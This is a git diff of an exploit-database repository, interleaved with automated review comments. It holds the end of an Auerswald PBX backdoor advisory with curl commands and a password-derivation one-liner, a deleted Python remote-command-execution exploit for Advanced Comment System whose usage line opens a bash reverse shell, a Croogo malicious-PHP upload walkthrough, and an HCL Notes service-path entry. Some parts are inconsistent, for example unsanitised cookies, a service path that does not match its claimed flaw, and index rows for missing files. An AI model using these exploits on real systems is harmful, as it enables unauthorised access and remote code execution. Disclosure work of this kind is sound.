+Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/ +[...] 
+------------------------------------------------------------------------ + +Next, the endpoint "/logstatus_state" can be queried using the returned +session ID to check the access level: + +------------------------------------------------------------------------ +% curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \ + https://192.168.1.2/logstatus_state + +HTTP/1.1 200 OK +X-XSS-Protection: 1 +Content-Type: application/json; charset=utf-8; +[...] + +{"logstatus":"Haendler"} +------------------------------------------------------------------------ + +The returned access level is "Haendler" (reseller). After login, the web +server redirects to a special service page at the path +"/statics/html/page_servicetools.html". Among other things, it allows to +download a backup of all data on the device, configure audio recording +and reset the password, PIN and token for the user "Admin". Accessing +regular administrative functions is not possible directly with this user +account. + +When inspecting the password checking function, a second backdoor can be +found. When the username "Admin" is specified, the given password is +tested against the configured password as well as a password derived in +a similar way from the PBX's serial number, the string "r2d2", the +current date and the configured language. The MD5 hash is taken and the +specified password is tested against the first seven characters of the +lower case hexadecimal hash. 
+ +The backdoor password for the "Admin" user can be calculated as follows: + +------------------------------------------------------------------------ +$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}' +92fcdd9 +------------------------------------------------------------------------ + +The server returns a session ID for that password and the username +"Admin": + +------------------------------------------------------------------------ +$ curl --user 'Admin:92fcdd9' --anyauth --include \ + https://192.168.1.2/tree + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/ +[...] + +[{"login":3,"userId":0,"userName":"",[...]}] +------------------------------------------------------------------------ + +Checking the access level of the session reveals the status +"Administrator": + +------------------------------------------------------------------------ +$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \ + https://192.168.1.2/logstatus_state + +HTTP/1.1 200 OK +Content-Type: application/json; charset=utf-8; +[...] + +{"logstatus":"Administrator"} +------------------------------------------------------------------------ + + +Workaround +========== + +Disable or restrict access to the web-based management interface if +possible. + + +Fix +=== + +Upgrade to a firmware version which corrects this vulnerability. + + +Security Risk +============= + +By inspecting the firmware for the COMpact 5500R PBX, attackers can +easily discover two backdoor passwords. One password is for the secret +user account with the username "Schandelah", the other works as an +alternative password for the user "Admin". Using the backdoor, attackers +are granted access to the PBX with the highest privileges, enabling them +to completely compromise the device. The passwords are derived from the +serial number, the current date and the configured language. 
+ +The backdoor passwords are not documented. They secretly coexist with a +documented password recovery function supported by the vendor. No way +was found to disable the backdoor access. + +All information needed to derive the passwords can be requested over the +network without authentication, so attackers only require network access +to the web-based management interface. + +Due to the ease of exploitation and severe consequences, the backdoor +passwords are rated as a high risk. + + +Timeline +======== + +2021-08-26 Vulnerability identified +2021-09-01 Customer approved disclosure to vendor +2021-09-10 Vendor notified +2021-09-10 CVE ID requested +2021-09-10 CVE ID assigned +2021-10-05 Vendor provides access to device with fixed firmware +2021-10-11 Vendor provides fixed firmware +2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected +2021-12-06 Advisory published + + +References +========== + +[1] https://www.auerswald.de/de/support/download/firmware-compact-5500 +[2] https://www.denx.de/wiki/U-Boot +[3] https://www.lighttpd.net +[4] https://ghidra-sre.org + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. 
If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/50559.py b/exploits/php/webapps/50559.py deleted file mode 100755 index 54f81c734..000000000 --- a/exploits/php/webapps/50559.py +++ /dev/null 
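Review bot: The header block at the top of the file has no `# Version:` line, while the sibling entries in this commit (50565.txt, 50570.txt, 50566.txt) all carry one, so the affected range is only recoverable from the Details section further down. Adding `# Version: <= 8.0B (COMpact 4000/5000(R)/5200(R)/5500R, COMmander 6000(R)(RX)); <= 4.0S (COMpact 3000 series)` would match the other files and also record the 4.0S branch that the title and the CSV description ("COMpact 8.0B") leave out. A `# Vendor Homepage:` line mirroring the `Vendor URL:` field would round out the metadata in the same way.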
@@ -1,65 +0,0 @@ -# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE) -# Date: November 30, 2021 -# Exploit Author: Nicole Daniella Murillo Mejias -# Version: Advanced Comment System 1.0 -# Tested on: Linux - -#!/usr/bin/env python3 - -# DESCRIPTION: -# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the -# response is filtered by the randomly generated alphanumeric string and only command output -# is displayed. -# -# USAGE: -# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted -# If any special characters are used, they should be quoted with single quotes. -# -# Example: -# -# python3 acspoc.py uname -a -# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1' - -import sys -import base64 -import requests -import random - -def generate_string(size): - str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" - return ''.join(random.choice(str) for i in range(size)) - -def exploit(cmd): - - # TODO: Change the URL to the target host - url = 'http://127.0.0.1/advanced_comment_system/index.php' - - headers = {'Content-Type': 'application/x-www-form-urlencoded'} - - encoded_cmd = base64.b64encode(cmd) - - delimiter = generate_string(6).encode() - - body = b'ACS_path=php://input%00&cbcmd=' - body += encoded_cmd - body += b'&' - - try: - result = requests.post(url=url, headers=headers, data=body) - except KeyboardInterrupt: - print("Keyboard interrupt detected.") - sys.exit() - - if f'{delimiter.decode()}: ' in result.text: - position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ") - - if len(result.text[position:]) > 0: - print(result.text[position:]) - else: - print(f"No output from command '{cmd.decode()}'") - print(f"Response size from target host: {len(result.text)} bytes") - -if __name__ == "__main__": - exploit(' '.join(sys.argv[1:]).encode()) \ No newline at end of file 
diff --git a/exploits/php/webapps/50570.txt b/exploits/php/webapps/50570.txt
new file mode 100644
index 000000000..c34180807
--- /dev/null
+++ b/exploits/php/webapps/50570.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
+# Date: 05/12/2021
+# Exploit Author: Deha Berkin Bir
+# Vendor Homepage: https://croogo.org/
+# Software Link: https://downloads.croogo.org/v3.0.2.zip
+# Version: 3.0.2
+# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
+
+==> Tutorial <==
+
+1- Login with your privileged account.
+2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
+3- Click the 'New Attachment' button.
+4- Choose a malicious php script and upload it.
+
+########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
+$command";
+?>
+############################################################################
+
+5- Click on the URL of malicious php script you uploaded.
+6- The malicious PHP script will be executed.
+
+
+==> HTTP Request (File Upload) <==
+
+POST /admin/file-manager/attachments/add HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694
+Content-Length: 976
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/file-manager/attachments/add
+Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_method"
+
+POST
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_csrfToken"
+
+bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="file"; filename="malicious.php"
+Content-Type: application/octet-stream
+
+$command";
+?>
+
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_Token[fields]"
+
+16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_Token[unlocked]"
+
+
+-----------------------------7028631106888453201670373694--
\ No newline at end of file
diff --git a/exploits/windows/local/50566.txt b/exploits/windows/local/50566.txt
new file mode 100644
index 000000000..8d7f83050
--- /dev/null
+++ b/exploits/windows/local/50566.txt
@@ -0,0 +1,28 @@
+# Exploit Title: HCL Lotus Notes V12- Unquoted Service Path
+# Exploit Author: Mert DAŞ
+# Version: V12
+# Date: 01/12/2021
+# Vendor Homepage: https://www.hcltechsw.com/domino/download
+# Tested on: Windows 10
+
+
+ProcessId : 3860
+Name : LNSUSvc
+DisplayName : HCL Notes Smart Upgrade Hizmeti
+PathName : c:\HCL\Notes\SUService.exe
+StartName : LocalSystem
+StartMode : Auto
+State : Running
+
+Discovery
+-------------------------
+C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 40fc72c29..553b1b86f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
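Review bot: The `Cookie:` header in the captured request still carries literal session identifiers (`CAKEPHP=…`, `PHPSESSID=…`) and CSRF token values, while the rest of the request already uses the `(HOST)` placeholder; the cookie `csrfToken` value also differs from the `_csrfToken` form field below it, and the `GeniXCMS-…` cookie belongs to a different application than Croogo, so the capture looks lifted from a shared test browser rather than sanitised for publication. Replacing those values with placeholders in the same style, e.g. `Cookie: csrfToken=(CSRF_TOKEN); CAKEPHP=(SESSION_ID)` and `(CSRF_TOKEN)` in the `_csrfToken` part, keeps the request reproducible without publishing what may be live session material. The `Content-Length: 976` header would then no longer match the body and should be dropped or recomputed.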
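Review bot: The service path shown, `PathName : c:\HCL\Notes\SUService.exe`, contains no spaces, so the unquoted-service-path weakness the title claims does not apply to it: Windows only resolves an unquoted service binary path ambiguously when a directory or file name in it contains whitespace, and a path without spaces resolves the same way whether quoted or not. The discovery command on the `C:\Users\Mert>wmic …` line only excludes quoted paths (`findstr /i /v """`) and never selects for paths that contain a space, so it cannot separate the exploitable case from this one. Either a service whose path does include a space should be shown, or the entry withdrawn; the generic `#Exploit:` paragraph about inserting code into the "system root path" does not explain how this particular path could be hijacked.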
@@ -11422,6 +11422,7 @@ id,file,description,date,author,type,platform,port
 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
 50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
 50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
+50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18571,6 +18572,10 @@ id,file,description,date,author,type,platform,port
 50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
 50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
 50539,exploits/linux/remote/50539.py,"GNU gdbserver 9.2 - Remote Command Execution (RCE)",1970-01-01,"Roberto Gesteira Miñarro",remote,linux,
+50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
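Review bot: The rows added here for `50567,exploits/hardware/remote/50567.txt` and `50568,exploits/hardware/remote/50568.txt` point at files this diff does not create; only 50565.txt, 50569.txt, 50570.txt and 50566.txt are added, so unless those two files arrive in a separate commit the index will reference paths that do not exist. Related to that, the tail of 50565.txt (its Security Risk section, "Attackers who already have acquired administrative access as a so-called sub-admin … rated to have a medium risk potential", plus the sqlite reference) describes the privilege-escalation issue that the 50567 row names rather than the authentication bypass in its own header, which suggests the advisory texts were assembled into the wrong files. The four file bodies are worth re-checking against their CSV descriptions before this lands.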
@@ -44648,8 +44653,8 @@ id,file,description,date,author,type,platform,port
 50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
 50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
-50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
 50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
 50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
 50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
 50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
+50570,exploits/php/webapps/50570.txt,"Croogo 3.0.2 - Remote Code Execution (Authenticated)",1970-01-01,"Deha Berkin Bir",webapps,php,